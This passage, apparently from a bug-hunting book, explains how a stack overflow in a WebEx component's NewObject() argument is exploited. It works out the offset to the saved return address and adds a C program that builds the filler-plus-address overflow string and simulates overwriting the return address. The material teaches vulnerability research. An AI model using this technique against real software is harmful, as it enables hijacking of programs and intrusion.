5.2 Exploitation

After I found the vulnerability, exploitation was easy. All I had to do was tweak the length of the string argument supplied to NewObject() to overflow the stack buffer and gain control of the return address of the current stack frame.

As illustrated in Figure 5-9, the distance from the SubKey buffer to the saved return address on the stack is 272 bytes: the offset of the saved return address (+00000004) minus the offset of SubKey (−0000010C), i.e. 0x4 − (−0x10C) = 0x110 = 272. I also had to account for the fact that the string “Authoring” and part of the format string will be copied into SubKey right before the user-controlled data (see Figure 5-10). All in all I had to subtract 40 bytes (“SOFTWARE\Webex\UCF\Components\Authoring\”) ...
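The offset arithmetic above is easy to get wrong by a few bytes, so the following C program models the frame layout from Figure 5-9 and checks where the attacker-supplied bytes land. This is an added illustration, not code from the book or from the WebEx component: the frame is an array with SubKey at offset 0, the saved frame pointer at 0x10C and the saved return address at 0x110, the 40-byte prefix is the string quoted above, and the unchecked copy is emulated with memcpy. The fake return address 0x41414141 is a placeholder, chosen only because it contains no NUL byte (a NUL would stop the %s copy early).

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Frame layout taken from Figure 5-9 of the text: SubKey at ebp-0x10C,
 * saved ebp at ebp+0, saved return address at ebp+4. Modelled here
 * relative to the start of SubKey. */
#define SAVED_EBP_OFF 0x10C
#define RET_OFF       0x110   /* 272 bytes past the start of SubKey */
#define FRAME_SIZE    (RET_OFF + 4)

/* Bytes that sprintf() places in SubKey before the user-controlled
 * argument: 40 bytes, as counted in the text. */
static const char PREFIX[] = "SOFTWARE\\Webex\\UCF\\Components\\Authoring\\";
#define PREFIX_LEN (sizeof(PREFIX) - 1)

/* Filler bytes the attacker must supply so that the four bytes that
 * follow the filler land exactly on the saved return address. */
size_t padding_len(void)
{
    return RET_OFF - PREFIX_LEN;            /* 272 - 40 = 232 */
}

/* Build the attacker-controlled string: filler followed by the fake
 * return address in little-endian order (x86). `out` must hold at least
 * padding_len() + 5 bytes. Returns the length without the trailing NUL.
 * The address must not contain a 0x00 byte: %s stops at the first NUL. */
size_t build_payload(unsigned char *out, uint32_t fake_ret)
{
    size_t pad = padding_len();
    memset(out, 'A', pad);
    out[pad + 0] = (unsigned char)(fake_ret & 0xff);
    out[pad + 1] = (unsigned char)((fake_ret >> 8) & 0xff);
    out[pad + 2] = (unsigned char)((fake_ret >> 16) & 0xff);
    out[pad + 3] = (unsigned char)((fake_ret >> 24) & 0xff);
    out[pad + 4] = '\0';
    return pad + 4;
}

/* Emulate the unchecked sprintf() into SubKey: prefix first, then the
 * user string including its terminating NUL, with no length check.
 * Returns whatever ends up in the saved-return-address slot. */
uint32_t simulate_overflow(const unsigned char *payload, size_t len)
{
    unsigned char frame[FRAME_SIZE + 1];   /* +1: NUL lands just past RET */
    uint32_t ret;

    memset(frame, 0, sizeof frame);
    memcpy(frame, PREFIX, PREFIX_LEN);
    memcpy(frame + PREFIX_LEN, payload, len + 1);   /* overflows SubKey */
    memcpy(&ret, frame + RET_OFF, sizeof ret);
    return ret;
}

int main(void)
{
    unsigned char payload[FRAME_SIZE];
    size_t n = build_payload(payload, 0x41414141u);   /* placeholder address */

    printf("prefix %zu bytes, padding %zu bytes, payload %zu bytes\n",
           PREFIX_LEN, padding_len(), n);
    printf("saved return address after copy: 0x%08lx\n",
           (unsigned long)simulate_overflow(payload, n));
    return 0;
}
```

Because the prefix occupies the first 40 bytes of SubKey, the user string needs only 232 bytes of filler before the four address bytes; the terminating NUL that sprintf() appends lands at offset 0x114, immediately after the return address. Any address with a zero byte would cut the copy short, which is why the placeholder above avoids one.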
